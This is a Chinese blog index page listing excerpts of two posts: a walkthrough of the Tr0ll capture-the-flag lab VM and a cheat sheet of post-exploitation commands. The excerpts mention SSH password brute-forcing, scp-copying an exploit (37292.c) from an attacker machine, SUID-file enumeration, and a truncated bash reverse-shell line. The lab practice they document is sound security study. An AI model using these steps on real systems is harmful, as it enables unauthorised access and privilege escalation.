2020年7月15日
Tr0ll靶机
摘要: 一、主机探测 二、信息收集 进入21端口 发现文件并下载 下载文件 作为字典进行登录爆破 用字典爆破 ssh登录 查找信息 /etc/init.d/ssh start scp root@192.168.111.128:/root/37292.c /tmp 或者直接上传 提权 阅读全文
posted @ 2020-07-15 17:53 bingtanghulu 阅读(249) 评论(0) 推荐(0) 编辑
常用命令
摘要: 查看suid文件 find / -type f -perm -u=s 2>dev/null 查找可写文件 find / -writable -type f 2>/dev/null 反弹shell 这里没有nc命令直接用bash命令。(也可以直接上传反弹shell的php脚本) bash -i >& 阅读全文
posted @ 2020-07-15 17:38 bingtanghulu 阅读(247) 评论(0) 推荐(0) 编辑